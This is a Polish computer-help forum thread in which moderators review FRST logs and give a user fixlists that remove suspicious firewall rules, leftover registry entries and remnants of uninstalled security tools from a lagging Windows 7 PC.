    FirewallRules: [{05C21E20-48AE-4D71-ABE4-9B7F55086C1C}] => (Allow) C:\Users\user\AppData\Local\Microsoft Websites\msiexec64.exe
    FirewallRules: [{2D2F9B87-4AFA-4B20-858D-4BE4ECF2D755}] => (Allow) C:\Windows\SysWOW64\rundll32.exe
    FirewallRules: [{8CFC1301-F921-419F-90A2-506A549340D7}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{ED1CC099-E104-44FD-BD1A-1405006FBC12}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{52383614-9190-4733-B0D2-119A55BEC221}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{10292A22-1D6A-448E-83FF-0A16306174B4}] => (Allow) C:\Users\user\AppData\Local\Microsoft Websites\msiexec64.exe
    FirewallRules: [{4E21FB6A-A7B3-46BB-BA6E-E0EDB3EB9FA5}] => (Allow) C:\Windows\SysWOW64\rundll32.exe
    FirewallRules: [{FAAE8B9E-D85C-410C-9007-B1FB8E618C17}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{FA92028C-49D3-4387-967D-C3FE6A04DCAA}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{7AE890E2-021E-480F-B97C-641A4A1B5BD4}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{2356446B-580E-42B8-B301-0E1D9A2AE1E6}] => (Allow) C:\Users\user\AppData\Local\Microsoft Websites\msiexec64.exe
    FirewallRules: [{9CC0547B-2D18-4E2D-BFF9-38B1ED5D64AC}] => (Allow) C:\Windows\SysWOW64\rundll32.exe
    FirewallRules: [{4B54067A-29F4-4D33-9E0D-9F74C7769ADE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{CBEC34EA-ABC6-48DA-9535-1830E456C520}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{9BBB26AC-BA31-4825-9BE9-4FD6B375F0E4}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{DF09EFDA-FD36-4429-8BC3-9CD2F3FB17EA}] => (Allow) C:\Users\user\AppData\Local\Microsoft Websites\msiexec64.exe
    FirewallRules: [{31BAE68E-9FAC-443C-AA30-1FDFE4691317}] => (Allow) C:\Windows\SysWOW64\rundll32.exe
    FirewallRules: [{A11FDC65-EA29-423A-AA93-6889603005CD}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{5383F60D-8287-4F07-962F-3DF447B21CCA}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{9720EB44-0269-4C8D-AB7B-6F32FE710CBB}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{E3AE2BAB-D95D-4562-B7F9-28690342703F}] => (Allow) C:\Users\user\AppData\Local\Microsoft Websites\msiexec64.exe
    FirewallRules: [{4E08F91D-43C4-4CB2-9BCF-6DE7F107BC03}] => (Allow) C:\Windows\SysWOW64\rundll32.exe
    FirewallRules: [{E4F5C94B-6571-4B48-8F60-CB8F6414E833}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{5CA402D2-6E6F-48FE-BBE3-9BC4E0B0FAEC}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{0727F5CF-6811-4122-B8F5-D4BAA8EC6FAB}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{8898CDCE-FFCF-4024-9C2C-2FB604800918}] => (Allow) C:\Users\user\AppData\Local\Microsoft Websites\msiexec64.exe
    FirewallRules: [{0B3E6B03-2FF6-4C17-82CB-6588045FF5FB}] => (Allow) C:\Windows\SysWOW64\rundll32.exe
    FirewallRules: [{C82562FE-87AD-4833-AF49-6EC3950A1B68}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{C69EA866-7CAC-4DE0-BDC5-9E07E3BD1FC0}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{78D2C617-E85B-48DF-8CE8-98CD1C25EEEC}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{83D25341-9C63-4E9D-B12A-9D0477753BFC}] => (Allow) C:\Users\user\AppData\Local\Microsoft Websites\msiexec64.exe
    FirewallRules: [{A28D7EFE-9284-43EE-9ED1-4E6F0AFAB9EA}] => (Allow) C:\Windows\SysWOW64\rundll32.exe
    FirewallRules: [{ACED8A8C-A281-4C91-84BD-BB90FD36E9F1}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{A0101A51-5A5D-4E1F-B7F6-63ED7785BB1A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{1FE48F8A-6C2B-4604-B228-D5034C84AAA9}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{276EEA78-0203-481E-A1EB-53C0BE227539}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{1D31FDB7-7396-40D1-A052-C13AD664DDD6}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{3F35D9E3-E4B7-4AC5-A6DF-9D1D39ABEADC}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{2E818267-3D03-41C3-8DE3-F3A0FE861AA9}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{1415ADF1-BCB2-47EB-9BA6-AC211F9613F1}] => (Allow) C:\Windows\SysWOW64\svchost.exe
    FirewallRules: [{2E86BC73-4DF3-4ADF-A0F5-66D408656EBF}] => (Allow) C:\Windows\SysWOW64\tracert.exe

    EmptyTemp:


    Po umieszczeniu pliku w katalogu z FRST uruchom FRST i wybierz opcję napraw.

    Jako że kombinowałeś z innymi dziwnymi programami wątpliwej reputacji, po wykonaniu fixa zrób jeszcze raz skanowanie w FRST i wrzuć nowe logi (oba).

    0
  • #12 13 Cze 2018 22:28
    KKK98
    Poziom 4  

    Mam Windows 7 z Service Pack 1. Da się tą poprawkę pobrać inaczej, czy muszę tam podać maila? Szczerze mówiąc nie pamiętam jaki mam zasilacz :D Zmieniałem części w komputerze ostatnio ok. 3 lat temu, nie wiem jak to sprawdzić. Ten blue screen pojawił się pierwszy raz przy próbie skanowania combofix, później już się nie pojawił. Kable wydaje mi się, że są ok. Instalowałem program Corel Draw, wersję trial, ale było to jakiś tydzień temu, a problemy zaczęły się 3 dni temu.

    Komputer laguje, zawiesza się - Przeglądarka się wyłącza, lagi, brak możliwościKomputer laguje, zawiesza się - Przeglądarka się wyłącza, lagi, brak możliwościKomputer laguje, zawiesza się - Przeglądarka się wyłącza, lagi, brak możliwości

    Dodano po 24 [minuty]:

    dt1 napisał:
    Nie używaj losowych narzędzi, za chwilę będziesz miał większy problem z komputerem. Combofix nie jest polecany ze względu na brak możliwości kontrolowania jego działania i sporadyczne powodowanie cięższych problemów. W tej chwili po użyciu tego całego badziewia logi wygenerowane przez FRST mogą być już nieaktualne.

    Odinstaluj:
    McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.667.1 - McAfee, Inc.)
    McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.7.190 - McAfee, Inc.)
    Intel Security True Key (HKLM\...\TrueKey) (Version: 4.16.112.1 - Intel Security)

    Po umieszczeniu pliku w katalogu z FRST uruchom FRST i wybierz opcję napraw.

    Jako że kombinowałeś z innymi dziwnymi programami wątpliwej reputacji, po wykonaniu fixa zrób jeszcze raz skanowanie w FRST i wrzuć nowe logi (oba).


    Mam odinstalować antywirusa?

    krzychupar napisał:
    Otwórz notatnik systemowy i wklej:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze, gdzie masz FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.


    Zrobiłem tak, niestety dalej bez zmian

    0
  • #13 13 Cze 2018 22:36
    king1q2w
    Poziom 10  

    Czy HDD był sprawdzany?
    Zamieść fotkę z crystaldiskinfo

    0
  • #14 13 Cze 2018 22:47
    lukaszd82
    Poziom 26  

    Fotka zasilacza lub pomiary napięć miernikiem... Za brak stabilności może też odpowiadać brak stabilności napięć zasilacza. W dłuższej perspektywie uszkodzeniu może ulec płyta główna, CPU, GPU, RAM, HDD, SSD itd... Czyli wszystko może paść jeśli zasilacz nie trzyma napięć na odpowiednich poziomach.
    Stąd pytanie o zasilacz.
    Wiadomo że nawet te z "czarnej listy" mogą trzymać napięcia ale jak padną to lubią zabrać ze sobą przynajmniej pół komputera...

    0
  • #15 13 Cze 2018 22:49
    dt1
    Moderator - Komputery Serwis

    KKK98 napisał:
    Mam odinstalować antywirusa?

    McAfee Security Scan Plus to nie jest antywirus.
    Również Web Advisor to nie jest antywirus.

    KKK98 napisał:
    Zrobiłem tak, niestety dalej bez zmian

    Powinien wygenerować się plik fixlog - proszę go tu zamieścić, zobaczymy co zostało zrobione.

    0
  • #16 13 Cze 2018 22:52
    KKK98
    Poziom 4  

    dt1 napisał:
    Nie używaj losowych narzędzi, za chwilę będziesz miał większy problem z komputerem. Combofix nie jest polecany ze względu na brak możliwości kontrolowania jego działania i sporadyczne powodowanie cięższych problemów. W tej chwili po użyciu tego całego badziewia logi wygenerowane przez FRST mogą być już nieaktualne.

    Odinstaluj:
    McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.667.1 - McAfee, Inc.)
    McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.7.190 - McAfee, Inc.)
    Intel Security True Key (HKLM\...\TrueKey) (Version: 4.16.112.1 - Intel Security)

    Utwórz plik o nazwie fixlist.txt i zapisz go w tym samym folderze, w którym masz pobrany program FRST. Zawartość tego pliku ma być dokładnie taka:

    Code:
    HKU\S-1-5-21-1835959491-1952066776-416301505-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [6501656 2014-10-23] (Piriform Ltd)
    
    HKU\S-1-5-21-1835959491-1952066776-416301505-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\System32\scrnsave.scr [11264 2009-07-14] (Microsoft Corporation)
    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
    SearchScopes: HKU\S-1-5-21-1835959491-1952066776-416301505-1000 -> DefaultScope {DAA9ECD9-1EAE-4688-A897-87F6664B112F}

    EmptyTemp:


    Po umieszczeniu pliku w katalogu z FRST uruchom FRST i wybierz opcję napraw.

    Jako że kombinowałeś z innymi dziwnymi programami wątpliwej reputacji, po wykonaniu fixa zrób jeszcze raz skanowanie w FRST i wrzuć nowe logi (oba).


    Przeskanowałem FRST w trybie awaryjnym, następnie udało się uruchomić w zwykłym trybie, i póki co przestało się lagować. Zobaczymy, co będzie jutro, na razie dzięki za pomoc :) Wcześniej użycie procesora podczas zwkłego przeglądania internetu wynosiło ok. 30%. teraz 2-3%

    0
  • #17 13 Cze 2018 23:05
    dt1
    Moderator - Komputery Serwis

    Nadal nie odinstalowałeś zbędnych śmieci od McAfee (Security Scan Plus i Web Advisor) - nie są szkodliwe, ale czym więcej takich śmieci, tym wolniej Twój komputer działa. Również Intel True Key, którego zapewne nie używasz, jest zainstalowany nadal.

    W systemie widać resztki AVG, warto uruchomić czyszczenie resztek tego produktu: https://files-download.avg.com/util/tools/AVG_Remover.exe

    W tej chwili masz już dwa antywirusy, rozumiem że masz za szybki komputer z za małą ilością problemów, dlatego taka sytuacja ma miejsce, jednakże na Twoim miejscu bym odinstalował jeden z antywirusów -

    Internet Security Essentials (HKLM-x32\...\ComodoIse) (Version: 1.3.438464.135 - Comodo)
    McAfee® Total Protection (HKLM-x32\...\MSC) (Version: 16.0 R12 - McAfee, Inc.)

    Pozostały śmieci po Spybocie, Combofixie:

    Code:
    Task: {13026E32-3806-4C1E-810A-DF67E3C62B2B} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Scan the system => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe
    
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service"


    Powyższe możesz wykonać jako kolejny fixlist, a jeśli zdecydujesz się na odinstalowanie wspomnianych aplikacji - możesz finalnie ostatni skan w FRST zrobić, aby wyczyścić śmietnik po tym wszystkim. Nic dziwnego, że komputer działa jak działa, skoro jest na nim instalowane co popadnie :)

    0
  • Pomocny post
    #19 14 Cze 2018 01:36
    dt1
    Moderator - Komputery Serwis

    Fixlist na doczyszczenie pozostałości po odinstalowanych rzeczach:

    Code:
    HKU\S-1-5-21-1835959491-1952066776-416301505-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [6501656 2014-10-23] (Piriform Ltd)
    
    Toolbar: HKU\S-1-5-21-1835959491-1952066776-416301505-1000 -> Brak nazwy - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} -  Brak pliku
    FF Extension: (Brak nazwy) - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [nie znaleziono]
    OPR Extension: (bcjindcccaagfpapjjmafapmmgkkhgoa) - C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Extensions\bcjindcccaagfpapjjmafapmmgkkhgoa [2015-04-06]
    2018-06-13 23:44 - 2018-06-13 23:49 - 000000000 ____D C:\AVG_Remover
    2018-06-13 22:50 - 2018-06-13 22:50 - 000000000 ____D C:\AdwCleaner
    2018-06-13 21:04 - 2018-06-13 21:04 - 000037230 _____ C:\ComboFix.txt
    2018-06-13 20:55 - 2018-06-13 21:04 - 000000000 ____D C:\ComboFix
    2018-06-13 20:31 - 2018-06-13 20:31 - 000000000 ____D C:\Users\user\AppData\Local\Comodo
    2018-06-13 20:28 - 2018-06-13 23:42 - 000000000 ____D C:\ProgramData\Comodo
    2018-06-13 20:28 - 2018-06-13 20:28 - 000000000 ____D C:\ProgramData\Comodo Downloader
    2018-06-13 20:23 - 2018-06-13 22:21 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
    2018-06-13 20:23 - 2018-06-13 22:16 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
    2018-06-13 20:23 - 2018-06-13 20:23 - 000000000 ____D C:\Windows\System32\Tasks\Safer-Networking
    2018-06-13 20:22 - 2018-06-13 20:22 - 069910960 _____ (Safer-Networking Ltd. ) C:\Users\user\Downloads\spybotsd-2.7.64.0.exe
    2018-06-13 20:16 - 2018-06-13 20:16 - 000388608 _____ (Trend Micro Inc.) C:\Users\user\Downloads\HijackThis_2.0.4.exe
    2018-06-13 23:49 - 2016-04-17 15:29 - 000000000 ____D C:\ProgramData\Avg
    2015-04-19 14:20 - 2015-04-19 14:20 - 000005872 _____ () C:\Users\user\AppData\Roaming\k49xLuIvOqGCIsguahR
    2015-04-14 18:28 - 2015-04-14 18:28 - 000004387 _____ () C:\Users\user\AppData\Roaming\Xff2P5UmAyoMW
    2018-06-13 23:44 - 2018-06-13 23:44 - 000111936 _____ (Microsoft Corporation) C:\Users\user\AppData\Local\Temp\MsiZap.exe
    Task: {594903D9-EC02-4251-B291-4ECF3CFA1DA1} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Check for updates => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
    Task: {761FCCBA-883C-4BE8-9FB8-8F3F7216E1E5} - System32\Tasks\Safer-Networking\Spybot - Search and Destroy\Refresh immunization => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service"


    W systemie już na tym etapie nie widać niczego podejrzanego.

    0
  • #21 14 Cze 2018 20:27
    krzychupar
    Poziom 40  

    Otwórz notatnik systemowy i wklej:

    SearchScopes: HKU\S-1-5-21-1835959491-1952066776-416301505-1000 -> DefaultScope {DAA9ECD9-1EAE-4688-A897-87F6664B112F} URL = hxxps://pl.search.yahoo.com/search?fr=mcafee_uninternational&type=C011PL0D20160423&p={searchTerms}
    SearchScopes: HKU\S-1-5-21-1835959491-1952066776-416301505-1000 -> {DAA9ECD9-1EAE-4688-A897-87F6664B112F} URL = hxxps://pl.search.yahoo.com/search?fr=mcafee_uninternational&type=C011PL0D20160423&p={searchTerms}
    BHO: Brak nazwy -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> Brak pliku
    BHO: Brak nazwy -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> Brak pliku
    BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> E:\MICROS~1\Office15\GROOVEEX.DLL => Brak pliku
    Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - Brak pliku
    FF Plugin: @microsoft.com/SharePoint,version=14.0 -> E:\MICROS~1\Office15\NPSPWRAP.DLL [Brak pliku]
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\MIF5BA~1\Office15\NPSPWRAP.DLL [Brak pliku]
    U3 mfeavfk01; Brak ImagePath
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze, gdzie masz FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.

    0
  • #22 14 Cze 2018 22:44
    KKK98
    Poziom 4  

    krzychupar napisał:
    Otwórz notatnik systemowy i wklej:

    SearchScopes: HKU\S-1-5-21-1835959491-1952066776-416301505-1000 -> DefaultScope {DAA9ECD9-1EAE-4688-A897-87F6664B112F} URL = hxxps://pl.search.yahoo.com/search?fr=mcafee_uninternational&type=C011PL0D20160423&p={searchTerms}
    SearchScopes: HKU\S-1-5-21-1835959491-1952066776-416301505-1000 -> {DAA9ECD9-1EAE-4688-A897-87F6664B112F} URL =
    Plik zapisz pod nazwą fixlist.txt i umieść w folderze, gdzie masz FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.

    0
  • #23 14 Cze 2018 22:48
    RADU23
    Moderator - Komputery Serwis

    Wykonaj jeszcze taki fixlist:

    Cytat:
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
    HKU\S-1-5-21-1835959491-1952066776-416301505-1000\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) <==== UWAGA (Brak ServiceDLL)
    U3 mfeavfk01; Brak ImagePath

    0
  • #24 15 Cze 2018 23:29
    KKK98
    Poziom 4  

    RADU23 napisał:
    Wykonaj jeszcze taki fixlist:

    Cytat:
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
    HKU\S-1-5-21-1835959491-1952066776-416301505-1000\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation) <==== UWAGA (Brak ServiceDLL)
    U3 mfeavfk01; Brak ImagePath


    Znowu pojawiły się delikatne lagi podczas grania :(

    0
  • #25 15 Cze 2018 23:33
    RADU23
    Moderator - Komputery Serwis

    W logach czysto.

    0
  • #26 18 Cze 2018 20:11
    KKK98
    Poziom 4  

    Chciałem ponownie zainstalować Worda, którego prawdopodobnie usunął mi FRST, lecz obojętnie jaką wersję bym próbował, pojawia się taki komunikat. Wie ktoś co z tym zrobić? Nie mam zainstalowanego żadnego SharePointa Komputer laguje, zawiesza się - Przeglądarka się wyłącza, lagi, brak możliwości

    0
  • #27 18 Cze 2018 21:20
    dt1
    Moderator - Komputery Serwis

    Lista zainstalowanych programów wyciągnięta z pliku addition mówi, że nie dość, że jest zainstalowany Sharepoint Designer x32, to jeszcze dodatkowo SP3 do niego:

    Code:
    Microsoft Office SharePoint Designer 2007 (HKLM-x32\...\SharePointDesigner) (Version: 12.0.6612.1000 - Microsoft Corporation)
    
    Microsoft Office SharePoint Designer 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0017-0000-0000-0000000FF1CE}_SharePointDesigner_{4B4DF6E2-5E40-422B-82DD-205FD7E79226}) (Version:  - Microsoft)


    Więc warto odinstalować te dwa programy, szczególnie jeśli się z nich nie korzysta.
    Zerknąłem na wszystkie fixlisty, żadna nie ingerowała w Worda, więc to raczej nie z winy FRSt przestał działać.

    0
  • #28 18 Cze 2018 22:05
    KKK98
    Poziom 4  

    dt1 napisał:
    Lista zainstalowanych programów wyciągnięta z pliku addition mówi, że nie dość, że jest zainstalowany Sharepoint Designer x32, to jeszcze dodatkowo SP3 do niego:

    Code:
    Microsoft Office SharePoint Designer 2007 (HKLM-x32\...\SharePointDesigner) (Version: 12.0.6612.1000 - Microsoft Corporation)
    
    Microsoft Office SharePoint Designer 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0017-0000-0000-0000000FF1CE}_SharePointDesigner_{4B4DF6E2-5E40-422B-82DD-205FD7E79226}) (Version:  - Microsoft)


    Więc warto odinstalować te dwa programy, szczególnie jeśli się z nich nie korzysta.
    Zerknąłem na wszystkie fixlisty, żadna nie ingerowała w Worda, więc to raczej nie z winy FRSt przestał działać.


    Ale nigdzie na dysku nie mogę go znaleźć :D Mam go za to w panelu sterowania, kiedy probuję odintalować, wyświetla się to

    Komputer laguje, zawiesza się - Przeglądarka się wyłącza, lagi, brak możliwości

    0
  • #30 18 Cze 2018 23:09
    KKK98
    Poziom 4  

    Próbowałem, panel sterowania dalej pokazuje, że program jest, a na dysku nic nie ma, szkoda, bo muszę pilnie edytować coś w wordzie :(

    0